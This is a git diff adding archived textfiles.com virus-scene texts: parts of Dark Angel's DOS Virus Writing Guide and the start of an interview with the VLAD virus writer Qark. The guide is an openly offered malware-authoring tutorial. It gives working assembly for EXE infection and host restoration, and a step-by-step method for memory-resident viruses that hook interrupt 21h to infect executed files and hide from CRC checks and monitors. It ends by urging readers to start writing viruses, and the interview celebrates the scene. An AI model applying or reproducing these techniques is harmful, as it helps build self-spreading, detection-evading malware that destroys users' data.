+          add     ax, 10h                          ; Skip the PSP
+          add     word ptr cs:[bp+ExeWhereToJump+2], ax
+          cli
+          add     ax, word ptr cs:[bp+StackSave+2] ; Restore the stack
+          mov     ss, ax
+          mov     sp, word ptr cs:[bp+StackSave]
+          sti
+          db      0eah                             ; JMP FAR PTR SEG:OFF
+  ExeWhereToJump:
+          dd      0
+  StackSave:
+          dd      0
+  
+  ExeWhereToJump2 dd 0
+  StackSave2      dd 0
+  
+  Upon  infection,   the  initial   CS:IP  and  SS:SP  should  be  stored  in
+  ExeWhereToJump2 and StackSave2, respectively.  They should then be moved to
+  ExeWhereToJump and  StackSave before  restoration of  the  program.    This
+  restoration may be easily accomplished with a series of MOVSW instructions.
+  
+  Some like  to clear all the registers prior to the JMP/RET, i.e. they issue
+  a bunch  of XOR  instructions.   If you  feel happy  and wish to waste code
+  space, you are welcome to do this, but it is unnecessary in most instances.
+  
+  ��������
+  THE BOMB
+  ��������
+  
+    "The horror!  The horror!"
+       - Joseph Conrad, The Heart of Darkness
+  
+  What goes through the mind of a lowly computer user when a virus activates?
+  What terrors  does the unsuspecting victim undergo as the computer suddenly
+  plays a  Nazi tune?  How awful it must be to lose thousands of man-hours of
+  work in an instant!
+  
+  Actually, I  do not  support wanton destruction of data and disks by virii.
+  It serves  no purpose  and usually  shows little imagination.  For example,
+  the world-famous Michelangelo virus did nothing more than overwrite sectors
+  of the  drive with  data taken at random from memory.  How original.  Yawn.
+  Of course,  if you  are hell-bent  on destruction, go ahead and destroy all
+  you want,  but just  remember that this portion of the virus is usually the
+  only part  seen by  "end-users" and distinguishes it from others.  The best
+  examples to date include: Ambulance Car, Cascade, Ping Pong, and Zero Hunt.
+  Don't forget the PHALCON/SKISM line, especially those by me (I had to throw
+  in a plug for the group)!
+  
+  As you  can see,  there's no  code to  speak of in this section.  Since all
+  bombs should be original, there isn't much point of putting in the code for
+  one, now  is there!   Of course, some virii don't contain any bomb to speak
+  of.   Generally speaking,  only those  under about  500 bytes  lack  bombs.
+  There is no advantage of not having a bomb other than size considerations.
+  
+  ���������
+  MEA CULPA
+  ���������
+  I regret  to inform  you that  the  EXE  infector  presented  in  the  last
+  installment was  not quite  perfect.   I admit  it.   I made  a mistake  of
+  colossal proportions   The  calculation of  the file size and file size mod
+  512 was screwed up.  Here is the corrected version:
+  
+  ; On entry, DX:AX hold the NEW file size
+  
+          push    ax                          ; Save low word of filesize
+          mov     cl, 9                       ; 2^9 = 512
+          shr     ax, cl                      ; / 512
+          ror     dx, cl                      ; / 512 (sort of)
+          stc                                 ; Check EXE header description
+                                              ; for explanation of addition
+          adc     dx, ax                      ; of 1 to the DIV 512 portion
+          pop     ax                          ; Restore low word of filesize
+          and     ah, 1                       ; MOD 512
+  
+  This results  in the file size / 512 + 1 in DX and the file size modulo 512
+  in AX.   The  rest remains  the same.  Test your EXE infection routine with
+  Microsoft's LINK.EXE,  since it  won't run  unless  the  EXE  infection  is
+  perfect.
+  
+  I have  saved you  the trouble  and smacked myself upside the head for this
+  dumb error.
+  
+  ���������������
+  TIPS AND TRICKS
+  ���������������
+  So now  all the  parts of  the nonresident  virus have been covered.  Yet I
+  find myself  left with several more K to fill.  So, I shall present several
+  simple techniques anyone can incorporate into virii to improve efficiency.
+  
+  1.   Use the heap
+       The heap  is the memory area between the end of code and the bottom of
+       the stack.   It can be conveniently treated as a data area by a virus.
+       By moving  variables to the heap, the virus need not keep variables in
+       its code,  thereby reducing  its length.  Note that since the contents
+       heap are  not part  of the  virus, only  temporary variables should be
+       kept there,  i.e. the  infection routine  should not count the heap as
+       part of  the virus as that would defeat the entire purpose of its use.
+       There are two ways of using the heap:
+       
+       ; First method
+       
+       EndOfVirus:
+       Variable1 equ $
+       Variable2 equ Variable1 + LengthOfVariable1
+       Variable3 equ Variable2 + LengthOfVariable2
+       Variable4 equ Variable3 + LengthOfVariable3
+       
+       ; Example of first method
+       
+       EndOfVirus:
+       StartingDirectory = $
+       TemporaryDTA      = StartingDirectory + 64
+       FileSize          = TemporaryDTA + 42
+       Flag              = FileSize + 4
+       
+       ; Second method
+       
+       EndOfVirus:
+       Variable1 db LengthOfVariable1 dup (?)
+       Variable2 db LengthOfVariable2 dup (?)
+       Variable3 db LengthOfVariable3 dup (?)
+       Variable4 db LengthOfVariable4 dup (?)
+       
+       ; Example of second method
+       EndOfVirus:
+       StartingDirectory db 64 dup (?)
+       TemporaryDTA      db 42 dup (?)
+       FileSize          dd ?
+       Flag              db ?
+       
+       The two  methods differ  slightly.   By using  the first  method,  you
+       create a  file which  will be  the exact  length of  the  virus  (plus
+       startup  code).     However,  when  referencing  the  variables,  size
+       specifications such as BYTE PTR, WORD PTR, DWORD PTR, etc. must always
+       be used  or the  assembler will  become befuddled.   Secondly,  if the
+       variables need  to be  rearranged for some reason, the entire chain of
+       EQUates will  be destroyed  and must  be rebuilt.   Virii  coded  with
+       second method  do not need size specifications, but the resulting file
+       will be  larger than  the actual size of the virus.  While this is not
+       normally a  problem, depending on the reinfection check, the virus may
+       infect the  original file  when run.   This  is not  a big disability,
+       especially considering the advantages of this method.
+       
+       In any  case, the  use of  the heap  can greatly  lessen the effective
+       length of the virus code and thereby make it much more efficient.  The
+       only thing  to watch  out for  is infecting  large COM files where the
+       heap will  "wrap around"  to offset  0 of the same segment, corrupting
+       the PSP.   However,  this problem is easily avoided.  When considering
+       whether a  COM file is too large to infect for this reason, simply add
+       the temporary variable area size to the virus size for the purposes of
+       the check.
+  
+  2.   Use procedures
+       Procedures are  helpful in  reducing the  size of  the virus, which is
+       always a  desired goal.   Only  use procedures if they save space.  To
+       determine the amount of bytes saved by the use of a procedure, use the
+       following formula:
+       
+       Let PS = the procedure size, in bytes
+       bytes saved = (PS - 4) * number invocations - PS
+       
+       For example, the close file procedure,
+       
+       close_file:
+         mov ah, 3eh      ; 2 bytes
+         int 21h          ; 2 bytes
+         ret              ; 1 byte
+                          ; PS = 2+2+1 = 5
+       
+       is only  viable if  it is used 6 or more times, as (5-4)*6 - 5 = 1.  A
+       whopping savings of one (1) byte!  Since no virus closes a file in six
+       different places,  the close  file procedure  is clearly  useless  and
+       should be avoided.
+       
+       Whenever  possible,  design  the  procedures  to  be  as  flexible  as
+       possible.   This is the chief reason why Bulgarian coding is so tight.
+       Just take  a look  at the source for Creeping Death.  For example, the
+       move file pointer procedure:
+       
+       go_eof:
+         mov al, 2
+       move_fp:
+         xor dx, dx
+       go_somewhere:
+         xor cx, cx
+         mov ah, 42h
+         int 21h
+         ret
+       
+       The function  was build  with flexibility  in mind.   With  a CALL  to
+       go_eof, the  procedure will  move the  file pointer  to the end of the
+       file.   A CALL  to move_fp  with AL set to 0, the file pointer will be
+       reset.   A CALL  to go_somewhere  with DX and AL set, the file pointer
+       may be  moved anywhere  within the  file.   If the  function  is  used
+       heavily, the savings could be enormous.
+  
+  3.   Use a good assembler and debugger
+       The best  assembler I have encountered to date is Turbo Assembler.  It
+       generates tight  code extremely  quickly.    Use  the  /m2  option  to
+       eliminate all  placeholder NOPs  from the  code.   The advantages  are
+       obvious - faster development and smaller code.
+       
+       The best  debugger is  also made  by Borland,  the king of development
+       tools.   Turbo Debugger  has so many features that you might just want
+       to buy  it so  you can  read the  manual!  It can bypass many debugger
+       traps with ease and is ideal for testing.  Additionally, this debugger
+       has 286  and 386  specific protected  mode versions, each of which are
+       even more powerful than their real mode counterparts.
+  
+  4.   Don't use MOV instead of LEA
+       When writing your first virus, you may often forget to use LEA instead
+       of MOV  when loading  offsets.  This is a serious mistake and is often
+       made by  beginning virus  coders.   The  harmful  effects  of  such  a
+       grevious error  are immediately obvious.  If the virus is not working,
+       check for  this bug.   It's  almost as hard to catch as a NULL pointer
+       error in C.
+  
+  5.   Read the latest issues of 40Hex
+       40Hex, PHALCON/SKISM's  official journal of virus techniques and news,
+       is a publication not to be missed by any self-respecting virus writer.
+       Each issue  contains techniques  and source code, designed to help all
+       virus writers,  be they  beginners or  experts.  Virus-related news is
+       also published.  Get it, read it, love it, eat it!
+  
+  ������
+  SO NOW
+  ������
+  you have  all the  code and information sufficient to write a viable virus,
+  as well  as a  wealth of  techniques to  use.   So stop  reading and  start
+  writing!   The only  way to  get better  is through practise.  After two or
+  three tries, you should be well on your way to writing good virii.
+
+Downloaded From P-80 International Information Systems 304-744-2253
diff --git a/textfiles.com/virus/ps_vir4.vir b/textfiles.com/virus/ps_vir4.vir
new file mode 100644
index 00000000..627c00a2
--- /dev/null
+++ b/textfiles.com/virus/ps_vir4.vir
@@ -0,0 +1,379 @@
+      //==//  //  //  /||      //      //====  //==//  //|   //
+     //  //  //  //  //||     //      //      //  //  //||  //
+    //==//  //==//  //=||    //      //      //  //  // || //
+   //      //  //  //  ||   //      //      //  //  //  ||//
+  //      //  //  //   ||  //====  //====  //==//  //   ||/
+  
+     /====   // //     //  /====   /|   /|
+    //      // //     //  //      //|  //|
+    ===\   // //     //   ===\   //|| //||
+      //  //  \\    //      //  // ||// ||
+  ====/  //    \\  //   ====/  //  ||/  ||
+  
+  �������������������������������������������
+  DISCLAIMER: This file is 100% guaranteed to
+    exist.  The author makes no claims to the
+    existence or nonexistence of the reader.
+  �������������������������������������������
+      This space intentionally left blank.
+  �������������������������������������������
+  GREETS: Welcome home, Hellraiser!  Hello to
+    the rest of the PHALCON/SKISM crew: Count
+    Zero, Demogorgon, Garbageheap, as well as
+    everyone else I failed to mention.
+  �������������������������������������������
+  
+  Dark Angel's Clumpy Virus Writing Guide
+  ���� ������� ������ ����� ������� �����
+    "It's the cheesiest" - Kraft
+  
+  ��������������������������������������
+  INSTALLMENT IV: RESIDENT VIRII, PART I
+  ��������������������������������������
+  
+  Now that the topic of nonresident virii has been addressed, this series now
+  turns to  memory resident virii.  This installment covers the theory behind
+  this type  of virus,  although no  code  will  be  presented.    With  this
+  knowledge in  hand, you  can boldly  write memory  resident virii confident
+  that you are not fucking up too badly.
+  
+  ����������
+  INTERRUPTS
+  ����������
+  DOS kindly  provides us  with a powerful method of enhancing itself, namely
+  memory resident programs.  Memory resident programs allow for the extention
+  and alteration  of the normal functioning of DOS.  To understand how memory
+  resident programs  work, it  is necessary  to delve into the intricacies of
+  the interrupt  table.   The interrupt table is located from memory location
+  0000:0000 to  0000:0400h (or  0040:0000), just  below the  BIOS information
+  area.   It consists of 256 double words, each representing a segment:offset
+  pair.   When an interrupt call is issued via an INT instruction, two things
+  occur, in this order:
+  
+    1) The flags are pushed onto the stack.
+    2) A  far call  is issued  to the segment:offset located in the interrupt
+       table.
+  
+  To return  from an  interrupt, an  iret instruction  is  used.    The  iret
+  instruction reverses  the order  of the  int call.    It  performs  a  retf
+  followed by  a  popf.    This  call/return  procedure  has  an  interesting
+  sideeffect when  considering interrupt  handlers which return values in the
+  flags register.   Such handlers must directly manipulate the flags register
+  saved in the stack rather than simply directly manipulating the register.
+  
+  The processor  searches the  interrupt table for the location to call.  For
+  example, when  an interrupt  21h is  called,  the  processor  searches  the
+  interrupt table  to find  the address  of the  interrupt 21h  handler.  The
+  segment of this pointer is 0000h and the offset is 21h*4, or 84h.  In other
+  words, the interrupt table is simply a consecutive chain of 256 pointers to
+  interrupts, ranging  from interrupt 0 to interrupt 255.  To find a specific
+  interrupt handler,  load in  a double word segment:offset pair from segment
+  0, offset  (interrupt number)*4.  The interrupt table is stored in standard
+  Intel reverse double word format, i.e. the offset is stored first, followed
+  by the segment.
+  
+  For a  program to  "capture" an interrupt, that is, redirect the interrupt,
+  it must  change the  data in the interrupt table.  This can be accomplished
+  either by  direct manipulation of the table or by a call to the appropriate
+  DOS function.  If the program manipulates the table directly, it should put
+  this code  between a CLI/STI pair, as issuing an interrupt by the processor
+  while the  table is  half-altered could have dire consequences.  Generally,
+  direct manipulation  is the  preferable alternative,  since some  primitive
+  programs such  as FluShot+  trap the  interrupt 21h  call used  to set  the
+  interrupt and  will warn  the user  if any  "unauthorised" programs  try to
+  change the handler.
+  
+  An interrupt handler is a piece of code which is executed when an interrupt
+  is requested.  The interrupt may either be requested by a program or may be
+  requested by  the processor.   Interrupt  21h is  an example of the former,
+  while interrupt 8h is an example of the latter.  The system BIOS supplies a
+  portion of  the interrupt  handlers, with  DOS and other programs supplying
+  the rest.   Generally, BIOS interrupts range from 0h to 1Fh, DOS interrupts
+  range from 20h to 2Fh, and the rest is available for use by programs.
+  
+  When a  program wishes  to install  its own  code, it must consider several
+  factors.  First of all, is it supplanting or overlaying existing code, that
+  is to  say, is  there already an interrupt handler present?  Secondly, does
+  the program  wish to preserve the functioning of the old interrupt handler?
+  For example,  a program  which "hooks"  into the  BIOS clock tick interrupt
+  would definitely  wish to preserve the old interrupt handler.  Ignoring the
+  presence of  the old  interrupt handler  could lead  to disastrous results,
+  especially if previously-loaded resident programs captured the interrupt.
+  
+  A technique  used in  many interrupt  handlers is  called "chaining."  With
+  chaining, both  the new and the old interrupt handlers are executed.  There
+  are two primary methods for chaining: preexecution and postexecution.  With
+  preexecution chaining,  the old  interrupt handler is called before the new
+  one.   This is  accomplished via  a pseudo-INT  call consisting  of a pushf
+  followed by  a call  far ptr.   The new interrupt handler is passed control
+  when the  old one  terminates.   Preexecution chaining is used when the new
+  interrupt handler wishes to use the results of the old interrupt handler in
+  deciding the  appropriate action  to take.   Postexecution chaining is more
+  straightforward, simply  consisting of  a jmp  far ptr  instruction.   This
+  method doesn't  even require  an iret  instruction to be located in the new
+  interrupt handler!  When the jmp is executed, the new interrupt handler has
+  completed its  actions and  control is passed to the old interrupt handler.
+  This method  is used  primarily when  a program  wishes  to  intercept  the
+  interrupt call before DOS or BIOS gets a chance to process it.
+  
+  ����������������������������������������
+  AN INTRODUCTION TO DOS MEMORY ALLOCATION
+  ����������������������������������������
+  Memory allocation  is perhaps one of the most difficult concepts, certainly
+  the hardest to implement, in DOS.  The problem lies in the lack of official
+  documentation by  both Microsoft  and IBM.  Unfortunately, knowledge of the
+  DOS memory manager is crucial in writing memory-resident virii.
+  
+  When a  program asks DOS for more memory, the operating system carves out a
+  chunk of memory from the pool of unallocated memory.  Although this concept
+  is simple enough to understand, it is necessary to delve deeper in order to
+  have sufficient  knowledge to  write effective  memory-resident virii.  DOS
+  creates memory  control blocks  (MCBs) to  help itself  keep track of these
+  chunks of  memory.  MCBs are paragraph-sized areas of memory which are each
+  devoted to  keeping track of one particular area of allocated memory.  When
+  a program  requests memory,  one paragraph  for the  MCB  is  allocated  in
+  addition to  the memory  requested by  the program.   The  MCB lies just in
+  front of  the memory  it controls.   Visually,  a MCB  and its memory looks
+  like:
+  
+  ���������������������������������������������Ŀ
+  � MCB 1 � Chunk o' memory controlled by MCB 1 �
+  �����������������������������������������������
+  
+  When a  second section  of memory is requested, another MCB is created just
+  above the memory last allocated.  Visually:
+  
+  �����������������������������������Ŀ
+  � MCB 1 � Chunk 1 � MCB 2 � Chunk 2 �
+  �������������������������������������
+  
+  In other  words, the  MCBs are  "stacked" one  on top  of the other.  It is
+  wasteful to deallocate MCB 1 before MCB 2, as holes in memory develop.  The
+  structure for the MCB is as follows:
+  
+  Offset    Size Meaning
+  ������ ������� �������
+  0         BYTE 'M' or 'Z'
+  1         WORD Process ID (PSP of block's owner)
+  3         WORD Size in paragraphs
+  5      3 BYTES Reserved (Unused)
+  8      8 BYTES DOS 4+ uses this.  Yay.
+  
+  If the  byte at  offset 0 is 'M', then the MCB is not the end of the chain.
+  The 'Z'  denotes the  end of the MCB chain.  There can be more than one MCB
+  chain present  in memory  at once and this "feature" is used by virii to go
+  resident in high memory.  The word at offset 1 is normally equal to the PSP
+  of the  MCB's owner.   If  it is  0, it means that the block is free and is
+  available for  use by programs.  A value of 0008h in this field denotes DOS
+  as the  owner of  the block.   The  value at  offset 3 does NOT include the
+  paragraph allocated  for the  MCB.  It reflects the value passed to the DOS
+  allocation functions.   All  fields located after the block size are pretty
+  useless so you might as well ignore them.
+  
+  When a  COM file is loaded, all available memory is allocated to it by DOS.
+  When an  EXE file  is loaded,  the amount  of memory  specified in  the EXE
+  header is  allocated.   There is  both a  minimum and  maximum value in the
+  header.    Usually,  the  linker  will  set  the  maximum  value  to  FFFFh
+  paragraphs.  If the program wishes to allocate memory, it must first shrink
+  the main  chunk of  memory owned  by the  program to  the minimum required.
+  Otherwise, the pathetic attempt at memory allocation will fail miserably.
+  
+  Since programs  normally are  not supposed to manipulate MCBs directly, the
+  DOS memory  manager calls  (48h -  4Ah) all return and accept values of the
+  first program-usable  memory paragraph,  that is,  the paragraph  of memory
+  immediately after  the MCB.   It  is important  to keep  this in  mind when
+  writing MCB-manipulating code.
+  
+  �������������������������
+  METHODS OF GOING RESIDENT
+  �������������������������
+  There are a variety of memory resident strategies.  The first is the use of
+  the  traditional  DOS  interrupt  TSR  routines,  either  INT  27h  or  INT
+  21h/Function 31h.   These  routines are  undesirable  when  writing  virii,
+  because they  do not  return control  back to  the program after execution.
+  Additionally, they  show up  on "memory  walkers" such  as PMAP and MAPMEM.
+  Even a doorknob can spot such a blatant viral presence.
+  
+  The traditional  viral alternative  to using the standard DOS interrupt is,
+  of course, writing a new residency routine.  Almost every modern virus uses
+  a routine to "load high," that is, to load itself into the highest possible
+  memory location.   For  example, in  a 640K  system, the  virus would  load
+  itself just  under the  640K but above the area reserved by DOS for program
+  use.   Although this  is technically  not the high memory area, it shall be
+  referred to as such in the remainder of this file in order to add confusion
+  and general  chaos into this otherwise well-behaved file.  Loading high can
+  be easily accomplished through a series of interrupt calls for reallocation
+  and allocation.  The general method is:
+  
+  1.   Find the memory size
+  2.   Shrink the program's memory to the total memory size - virus size
+  3.   Allocate memory for the virus (this will be in the high memory area)
+  4.   Change the program's MCB to the end of the chain (Mark it with 'Z')
+  5.   Copy the virus to high memory
+  6.   Save the old interrupt vectors if the virus wishes to chain vectors
+  7.   Set the interrupt vectors to the appropriate locations in high memory
+  
+  When calculating  memory sizes,  remember that all sizes are in paragraphs.
+  The MCB  must also  be considered,  as it takes up one paragraph of memory.
+  The advantage  of this  method is  that it  does not, as a rule, show up on
+  memory walkers.  However, the total system memory as shown by such programs
+  as CHKDSK will decrease.
+  
+  A third alternative is no allocation at all.  Some virii copy themselves to
+  the memory just under 640K, but fail to allocate the memory.  This can have
+  disastrous consequences, as any program loaded by DOS can possibly use this
+  memory.   If it is corrupted, unpredictable results can occur.  Although no
+  memory loss  is shown  by CHKDSK,  the possible  chaos resulting  from this
+  method is  clearly unacceptable.   Some  virii use memory known to be free.
+  For example,  the top  of the  interrupt table or parts of video memory all
+  may be  used with  some assurance  that the  memory will  not be corrupted.
+  Once again, this technique is undesirable as it is extremely unstable.
+  
+  These techniques  are by  no means  the only  methods of residency.  I have
+  seen such  bizarre methods  as going  resident in  the  DOS  internal  disk
+  buffers.  Where there's memory, there's a way.
+  
+  It is  often desirable  to know  if the  virus is  already resident.    The
+  simplest method  of doing  this is  to write  a checking  function  in  the
+  interrupt handler  code.   For example, a call to interrupt 21h with the ax
+  register set  to 7823h  might  return  a  4323h  value  in  ax,  signifying
+  residency.   When using  this check,  it is  important to  ensure  that  no
+  possible conflicts  with either  other programs  or DOS  itself will occur.
+  Another method,  albeit a  costly process  in terms  of both  time and code
+  length, is  to check  each segment  in memory  for the  code indicating the
+  presence of the virus.  This method is, of course, undesirable, since it is
+  far, far  simpler to  code a  simple check  via the  interrupt handler.  By
+  using any  type of  check, the  virus need  not fear  going resident twice,
+  which would simply be a waste of memory.
+  
+  �������������
+  WHY RESIDENT?
+  �������������
+  Memory resident virii have several distinct advantages over runtime virii.
+     o Size
+       Memory resident virii are often smaller than their runtime brethern as
+       they do not need to include code to search for files to infect.
+     o Effectiveness
+       They are  often more  virulent, since  even the  DIR  command  can  be
+       "infected."   Generally, the standard technique is to infect each file
+       that is executed while the virus is resident.
+     o Speed
+       Runtime virii  infect before  a file is executed.  A poorly written or
+       large runtime  virus will  cause a  noticible delay  before  execution
+       easily spotted  by users.   Additionally,  it causes  inordinate  disk
+       activity which is detrimental to the lifespan of the virus.
+     o Stealth
+       The manipulation  of  interrupts  allows  for  the  implementation  of
+       stealth techniques,  such as  the hiding of changes in file lengths in
+       directory listings and on-the-fly disinfection.  Thus it is harder for
+       the average  user to detect the virus.  Additionally, the crafty virus
+       may even  hide from CRC checks, thereby obliterating yet another anti-
+       virus detection technique.
+  
+  �������������������������������
+  STRUCTURE OF THE RESIDENT VIRUS
+  �������������������������������
+  With the  preliminary information  out of  the way,  the discussion can now
+  shift to  more virus-related,  certainly  more  interesting  topics.    The
+  structure of  the memory resident virus is radically different from that of
+  the runtime virus.  It simply consists of a short stub used to determine if
+  the virus  is already  resident.   If it is not already in memory, the stuf
+  loads it  into memory through whichever method.  Finally, the stub restores
+  control to  the host  program.   The rest of the code of the resident virus
+  consists of interrupt handlers where the bulk of the work is done.
+  
+  The stub  is the only portion of the virus which needs to have delta offset
+  calculations.  The interrupt handler ideally will exist at a location which
+  will not  require such  mundane fixups.   Once  loaded, there  should be no
+  further use  of the  delta offset,  as the  location of  the  variables  is
+  preset.   Since the resident virus code should originate at offset 0 of the
+  memory block,  originate the source code at offset 0.  Do not include a jmp
+  to the  virus code  in the original carrier file.  When moving the virus to
+  memory, simply  move starting  from [bp+startvirus]  and the offsets should
+  work out  as they  are in  the source file.  This simplifies (and shortens)
+  the coding of the interrupt handlers.
+  
+  Several things  must be  considered in writing the interrupt handlers for a
+  virus.   First, the  virus must  preserve the registers.  If the virus uses
+  preexecution chaining,  it must  save the  registers after  the call to the
+  original handler.   If  the virus  uses  postexecution  chaining,  it  must
+  restore the original registers of the interrupt call before the call to the
+  original handler.   Second, it is more difficult, though not impossible, to
+  implement encryption  with memory  resident virii.   The problem is that if
+  the interrupt handler is encrypted, that interrupt handler cannot be called
+  before the  decryption function.  This can be a major pain in the ass.  The
+  cheesy way  out is  to simply  not include encryption.  I prefer the cheesy
+  way.   The noncheesy  readers out  there might  wish  to  have  the  memory
+  simultaneously hold  two copies  of the virus, encrypt the unused copy, and
+  use the  encrypted copy  as the  write buffer.   Of course, the virus would
+  then take twice the amount of memory it would normally require.  The use of
+  encryption is  a matter  of personal  choice and  cheesiness.  A sidebar to
+  preservation of interrupt handlers: As noted earlier, the flags register is
+  restored from  the stack.  It is important in preexecution chaining to save
+  the new  flags register  onto the  stack where  the old  flags register was
+  stored.
+  
+  Another important  factor to  consider  when  writing  interrupt  handlers,
+  especially those  of BIOS  interrupts, is  DOS's lack  of reentrance.  This
+  means that  DOS functions  cannot be  executed while DOS is in the midst of
+  processing an  interrupt request.   This  is because  DOS sets  up the same
+  stack pointer  each time it is called, and calling the second DOS interrupt
+  will cause  the processing  of one  to overwrite  the stack  of the  other,
+  causing  unpredictable,   but  often   terminal,  results.    This  applies
+  regardless of  which DOS  interrupts are  called, but it is especially true
+  for interrupt  21h, since  it is  often tempting  to use  it from within an
+  interrupt handler.   Unless  it is  certain that  DOS is  not processing  a
+  previous request,  do NOT  use a DOS function in the interrupt handler.  It
+  is possible  to use  the "lower"  interrupt 21h  functions without  fear of
+  corrupting the  stack, but  they are basically the useless ones, performing
+  functions easily  handled by  BIOS calls  or direct  hardware access.  This
+  entire discussion only applies to hooking non-DOS interrupts.  With hooking
+  DOS interrupts  comes the  assurance that  DOS is  not executing elsewhere,
+  since it  would then  be corrupting  its own  stack, which  would be a most
+  unfortunate occurence indeed.
+  
+  The most  common interrupt to hook is, naturally, interrupt 21h.  Interrupt
+  21h is called by just about every DOS program.  The usual strategy is for a
+  virus to  find potential files to infect by intercepting certain DOS calls.
+  The primary  functions to hook include the find first, find next, open, and
+  execute commands.   By  cleverly using  pre and  postexecution chaining,  a
+  virus can  easily find  the file  which was  found, opened, or executed and
+  infect it.   The  trick is simply finding the appropriate method to isolate
+  the filename.   Once that is done, the rest is essentially identical to the
+  runtime virus.
+  
+  When calling  interrupts hooked by the virus from the virus interrupt code,
+  make sure  that the  virus does  not trap  this particular  call,  lest  an
+  infinite loop  result.  For example, if the execute function is trapped and
+  the virus  wishes, for some reason, to execute a particular file using this
+  function, it  should NOT  use a  simple "int  21h" to do the job.  In cases
+  such as  this  where  the  problem  is  unavoidable,  simply  simulate  the
+  interrupt call with a pushf/call combination.
+  
+  The basic  structure of the interrupt handler is quite simple.  The handler
+  first screens  the registers  for either  an identification  call or  for a
+  trapped function  such as  execute.   If it  is not  one of  the above, the
+  handler throws control back to the original interrupt handler.  If it is an
+  identification request,  the handler  simply sets the appropriate registers
+  and returns  to the  calling program.   Otherwise, the virus must decide if
+  the request  calls for  pre or postexecution chaining.  Regardless of which
+  it uses,  the virus  must find  the filename  and use  that information  to
+  infect.   The filename  may be found either through the use of registers as
+  pointers or  by searching  thorugh certain  data structures,  such as FCBs.
+  The infection  routine is  the same  as that of nonresident virii, with the
+  exception of the guidelines outlined in the previous few paragraphs.
+  
+  ��������������
+  WHAT'S TO COME
+  ��������������
+  I apologise for the somewhat cryptic sentences used in the guide, but I'm a
+  programmer, not  a writer.   My  only suggestion is to read everything over
+  until it  makes sense.   I  decided to  pack this  issue of  the guide with
+  theory rather  than code.   In the next installment, I will present all the
+  code necessary to write a memory-resident virus, along with some techniques
+  which may be used.  However, all the information needed to write a resident
+  virii has  been included  in this  installment; it  is merely  a matter  of
+  implementation.  Have buckets o' fun!
+
+
+Downloaded From P-80 International Information Systems 304-744-2253
diff --git a/textfiles.com/virus/qkinterv.iew b/textfiles.com/virus/qkinterv.iew
new file mode 100644
index 00000000..4f673827
--- /dev/null
+++ b/textfiles.com/virus/qkinterv.iew
@@ -0,0 +1,445 @@
+Qark is one of the two founders of VLAD (Virus Labs And Distrubution).
+(The other founder, Metabolis was interviewed by me for IR6) He's
+of course a viruswriter and has written a lot of new groundbreaking
+viruses, invented new techniques and has in a quite short time made a very
+good reputation for himself and VLAD.
+
+Well, I got nothing to add about this person, because you should
+know him :-), by reputation or via IRC than he's very nice and even
+though he's a highly skilled coder, he's always happy to help you out!
+Enjoy!
+
+- The Unforgiven.
+
+PS.
+
+	   '-' = TU
+	no '-' = Qark :-).
+
+Edited by Qark, himself.
+================================================================================
+
+-Even though it might be pointless, introduce yourself to the readers!
+
+ I am Qark, an Australian virus writer born in the seventies.
+
+-How are you in a private matter?
+
+ What ? :-)   (non comprende)
+
+-How is it to live in Australia?
+
+ A lot warmer than Sweden! :-)  I've never seen snow..
+
+ Australia is alot like the US but fewer guns and a different accent.
+
+-In what other country could you consider living?
+
+ Only english speaking countries where its not too cold.
+ Maybe England or New Zealand (USA has too much crime).
+
+-Do you have any plans to move away from Australia?
+
+ Nope.
+
+-What do you do for a living?
+
+ I'm a Tertiary Student, although I don't take university very
+ seriously.  I choose most of my subjects based on their ability
+ to help my virus writing skills.  Most of the time I skip my
+ lectures and get drunk at the club hehe :-)
+
+-What do you do on your spare time?
+
+ Writing viruses is my main hobby, (I don't use my computer
+ unless it is somehow related to computer viruses).
+ My other hobby is reading fantasy books.
+
+-Do you have a girlfriend/wife or a steady relationship?
+
+ Nope.
+
+-How would you describe the average viruswriter?
+
+ Most of them are fairly cool on an individual basis.  The
+ lame, "eye w1ll inf3ct th3 w0rld" attitude normally leaves
+ coders if they get any good.
+
+-What do you think nearly all viruswriters share in-common?
+
+ All are young males.
+
+ The Unforgiven disagrees with me about this, but I beleive
+ more than half of virus writers come from broken homes of some
+ sort.  This doesn't hold true for alot of virus writers (eg The Unforgiven)
+ but I would say there is a higher rate than in the general community.
+
+ Of the Australian virus writers only one that I know of, doesn't come from
+ a disfunctional family.  I don't know what this other fact means, but
+ of the Australian virus writers, all are either immigrants, or the
+ children of immigrants.  The only exception is me :-)
+
+-From where did you get you handle, Qark?
+
+ I just picked it out before going on irc one time, and I've stuck with it.
+
+-When did you discover the world of computers?
+
+ I have only owned a computer for about three years and before
+ that I knew nothing about them.
+
+-How long have you been active in the virus-scene, were you active
+ in any scene before the virus-scene?
+
+ I have been in the virus scene since the end of 1994, and before
+ that I used to leech warez :-)
+
+-How did you come into the virus business?
+
+ The first thing I did when I got a computer was start trying to write
+ viruses.  That's half the reason I got a computer in the first place.
+ It was always a fascination of mine, ever since I heard the concept.
+
+-What parts of the underground do you think needs improvement,
+ and what do you think is lacking in the virus-community?
+
+ I hate the entire underground basically.  Most people can't do shit,
+ but like to show off over nothing.
+
+-Positive/negative aspects of the (mainly virus) scene?
+
+ Positive: alot of the people you meet are really interesting.
+ Negative: there aren't many good coders around at the moment.
+
+-Have you been involved in any other group than Vlad,
+ (if yes, which group, and what did you do for them?)
+
+ nope
+
+-What's VLAD goal?
+
+ To write cool new viruses.
+
+-What does it take to become a VLAD member?
+
+ You have to be a good coder, and all the members have to like you.
+ We have too many members right now, so it's almost impossible to become
+ a member at the moment, unless someone quits.
+
+-Have you met any Vlad member privately?
+
+ I've met Metabolis about five times, and Quantum twice.
+
+-How is VLAD organized?
+
+ Metabolis is the leader and makes all the decisions.
+ I'm 'pseudo-second in command' or something.  My main responsibility
+ is gathering together and organising our viruses and articles for the
+ magazine, which I also do the coding for.
+
+-Do VLAD-australia have meetings or so?
+
+ Every magazine I go over to Metabolis' place and we finish off the
+ magazine together, and since we are the only two Australian VLAD
+ members, thats a VLAD-Australia meeting :-)
+ Neuron and Quantum are normally at the VLAD meetings so it means we
+ have four virus writers in the one place, which is an interesting
+ experience.  If Talon had turned up, it would have been a proper Australian
+ virus-con.
+
+-Have you ever had any trouble with any members?
+
+ Well, once I punched Quantum in the face for strangling me, but
+ if you mean internal politics, none :-)
+
+-Have VLAD got in problems with any other virus-group, or person
+ involved in the vx-scene? (Why did it started, how did it end?)
+
+ We had a flame-war with Aristotle about a year ago, but that seems to
+ have just faded away...
+
+-Do you have any couriers that spread your viruses around infecting
+ software?
+
+ No.
+
+-Which VLAD-viruses has leaked in the wild?
+
+ Hemlock infected a few people.  I suspect it was spread by
